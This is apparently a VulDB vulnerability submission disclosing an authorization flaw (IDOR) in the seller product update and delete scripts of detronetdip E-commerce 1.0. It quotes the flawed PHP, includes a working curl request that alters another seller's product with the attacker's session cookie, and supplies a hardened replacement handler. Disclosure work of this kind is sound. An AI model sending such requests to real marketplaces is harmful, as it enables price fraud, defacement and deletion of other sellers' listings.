Submit #754030: detronetdip E-commerce 1.0 Access Control Violation

Title: detronetdip E-commerce 1.0 Access Control Violation

Description:

**Severity:** **HIGH** (8.1)
**CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`
**Bug Type:** CWE-639: Authorization Bypass Through User-Controlled Key

The application suffers from Insecure Direct Object Reference (IDOR) vulnerabilities in the seller product management modules. The SQL queries behind the "Delete" and "Update" operations rely solely on the `id` parameter supplied in the HTTP POST request to select the record to modify. The backend never verifies that the record identified by that `id` belongs to the currently authenticated seller. Although the code reads the session user ID (`$_SESSION['SELLER_ID']`), that value is **never used in the WHERE clause** of the UPDATE/DELETE statement. The result is horizontal privilege escalation: any authenticated seller can modify or delete products belonging to any other seller simply by iterating through the sequential product IDs.

### Vulnerable Files

* `seller/assets/backend/product/product_delete.php` (arbitrary deletion)
* `seller/assets/backend/product/updateproduct.php` (arbitrary price/content manipulation)

### Vulnerable Code Analysis

**File:** `seller/assets/backend/product/updateproduct.php`

```php
// The input ID is sanitized against SQLi but not validated for ownership.
$id=get_safe_value($con,$_POST['id']);

// The logged-in seller's ID is retrieved but IGNORED in the logic below.
$added_by= $_SESSION['SELLER_ID'];

// FLAW: The UPDATE query targets the row based ONLY on 'id'.
// There is no check like "AND seller_id = '$added_by'".
$qyery="update product set product_name='$name', price='$price'... where id='$id'";
if(mysqli_query($con,$qyery)){
    // ...
}
```

Note that `mysqli_query()` returns `true` for any UPDATE that executes without error, even when zero rows match, so the handler reports success regardless of which seller owns the row.

### Exploit Proof of Concept (PoC)

**Scenario:** The attacker is logged in as a seller (the `PHPSESSID` below is the attacker's own session) and targets product ID `10`, which is owned by a different seller. The request renames the product, sets its list price to `1000`, its selling price to `1`, and its stock quantity to `10`.

**Exploit Command:**

```bash
curl -X POST \
  -H "Cookie: PHPSESSID=d14c5dd7d7b75b3665ec97ff405915b3" \
  -d "id=10" \
  -d "name=Iphone_15_Pro_Max_HACKED" \
  -d "price=1000" \
  -d "sellprice=1" \
  -d "quantity=10" \
  -d "category=1" \
  -d "subcat=1" \
  -d "description=Hacked_by_Nixon" \
  "http://localhost:3000/seller/assets/backend/product/updateproduct.php"
```

**Output:** The JSON response confirms the modification of the victim's product.

```json
{"code":1,"id":"10"}
```

To reproduce, log in as seller A, pick a product ID that belongs to seller B (for example from the public product listing), and send the request above with seller A's `PHPSESSID`; a `{"code":1,...}` response and the changed listing confirm the cross-seller write. The same request shape against `product_delete.php` confirms the deletion variant.

### Impact

* **Financial Fraud:** Attackers can drastically reduce the selling price of high-value items (e.g., to $0 or $1) and purchase them, causing direct financial loss to other sellers.
* **Marketplace Defacement:** Attackers can deface the platform by changing product names and descriptions to offensive content or spam.
* **Denial of Service:** Because `product_delete.php` has the same flaw, an attacker can delete the entire product catalog by looping over all product IDs.

## Remediation Recommendations

### Implement Access Control (IDOR Fix)

To mitigate the IDOR, every product query in `updateproduct.php` and `product_delete.php` must include an ownership check: the SQL `WHERE` clause must bind the action to the currently logged-in seller, using the session value the code already reads into `$added_by`.

* *Vulnerable:* `UPDATE product SET ... WHERE id = '$id'`
* *Secure:* `UPDATE product SET ... WHERE id = '$id' AND seller_id = '$_SESSION[SELLER_ID]'`

The same change applies to the `DELETE` statement in `product_delete.php`. Two caveats for whoever applies the fix: the column name must match the schema (the handler stores the session value in a variable called `$added_by`, so the owning-seller column may not literally be named `seller_id`), and the "secure" form above still interpolates values into the SQL string and therefore still depends on `get_safe_value()` for injection safety. The robust fix is a prepared statement with both the product `id` and the seller ID bound as parameters, and the handler should treat "zero rows matched" as a failure (e.g., HTTP 403) instead of returning `{"code":1,...}` whenever the statement executes.
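The following is an added example of the hardened handler described above; it is not detronetdip's code and not part of the original submission. It assumes, as the original handlers do, that `$con` is an open `mysqli` connection created by the application's existing include, that the `product` table has an owning-seller column named `seller_id`, and that the columns `product_name`, `price`, `sellprice`, `quantity` and `description` exist under those names. The `action` field is a hypothetical addition so that one script can show both the update and the delete path; the real application keeps them in separate files.

```php
<?php
// Added example, not detronetdip's code. Hardened replacement logic for
// updateproduct.php and product_delete.php. Assumptions: $con is an open
// mysqli connection from the app's existing include, the `product` table has
// an owning-seller column `seller_id`, and the other column names match.

// Returns true only if $seller_id owns product $id. Both predicates are bound
// parameters, so the check is also the SQL-injection-safe form of the query.
function seller_owns_product(mysqli $con, int $seller_id, int $id): bool
{
    $stmt = mysqli_prepare($con, 'SELECT 1 FROM product WHERE id = ? AND seller_id = ?');
    mysqli_stmt_bind_param($stmt, 'ii', $id, $seller_id);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_store_result($stmt);
    $owned = mysqli_stmt_num_rows($stmt) === 1;
    mysqli_stmt_close($stmt);
    return $owned;
}

// The ownership predicate is repeated inside the UPDATE itself, so a caller
// that forgets seller_owns_product() still cannot touch another seller's row.
function update_product(mysqli $con, int $seller_id, int $id, string $name,
                        float $price, float $sellprice, int $quantity, string $description): bool
{
    $stmt = mysqli_prepare($con,
        'UPDATE product SET product_name = ?, price = ?, sellprice = ?, quantity = ?, description = ?
         WHERE id = ? AND seller_id = ?');
    mysqli_stmt_bind_param($stmt, 'sddisii', $name, $price, $sellprice, $quantity, $description, $id, $seller_id);
    $ok = mysqli_stmt_execute($stmt);
    mysqli_stmt_close($stmt);
    return $ok;
}

// DELETE with the same ownership predicate; exactly one row must go away.
function delete_product(mysqli $con, int $seller_id, int $id): bool
{
    $stmt = mysqli_prepare($con, 'DELETE FROM product WHERE id = ? AND seller_id = ?');
    mysqli_stmt_bind_param($stmt, 'ii', $id, $seller_id);
    $ok = mysqli_stmt_execute($stmt) && mysqli_stmt_affected_rows($stmt) === 1;
    mysqli_stmt_close($stmt);
    return $ok;
}

function respond(int $status, array $body): void
{
    http_response_code($status);
    header('Content-Type: application/json');
    echo json_encode($body);
    exit;
}

session_start();
if (empty($_SESSION['SELLER_ID'])) {
    respond(401, ['code' => 0, 'error' => 'not authenticated']);
}
$seller_id = (int) $_SESSION['SELLER_ID'];

// Reject malformed input instead of "sanitizing" it into the query.
$id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    respond(400, ['code' => 0, 'error' => 'invalid id']);
}

// Hypothetical `action` field (assumption) so one script serves both paths.
$action = $_POST['action'] ?? 'update';

// Same answer for "does not exist" and "not yours": no oracle for ID enumeration.
if (!seller_owns_product($con, $seller_id, $id)) {
    respond(403, ['code' => 0, 'error' => 'product not found or not owned by this seller']);
}

if ($action === 'delete') {
    $ok = delete_product($con, $seller_id, $id);
} else {
    $name        = trim((string) ($_POST['name'] ?? ''));
    $price       = filter_input(INPUT_POST, 'price', FILTER_VALIDATE_FLOAT);
    $sellprice   = filter_input(INPUT_POST, 'sellprice', FILTER_VALIDATE_FLOAT);
    $quantity    = filter_input(INPUT_POST, 'quantity', FILTER_VALIDATE_INT);
    $description = (string) ($_POST['description'] ?? '');
    if ($name === '' || $price === false || $price === null
        || $sellprice === false || $sellprice === null
        || $quantity === false || $quantity === null) {
        respond(400, ['code' => 0, 'error' => 'invalid product fields']);
    }
    $ok = update_product($con, $seller_id, $id, $name, $price, $sellprice, $quantity, $description);
}

respond($ok ? 200 : 500, ['code' => $ok ? 1 : 0, 'id' => $id]);
```

With this in place, the PoC request above (seller A's session, seller B's product ID) receives a 403 and the row is untouched, while a seller editing their own product still gets the `{"code":1,"id":...}` shape the front end expects. The ownership check is deliberately performed twice, once up front for a clean error and once inside the write itself, so that the authorization cannot be bypassed by any future code path that reaches `update_product()` or `delete_product()` directly.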
Source: https://github.com/Nixon-H/Ecommerce-IDOR-Product-Manipulation
User: Nixon-H (UID 95173)
Submission: 02/07/2026 16:55
Moderation: 02/18/2026 15:10 (11 days later)
Status: Accepted
VulDB entry: 346486 [detronetdip E-commerce 1.0.0 Product Management Delete/Update ID authorization]
Points: 20
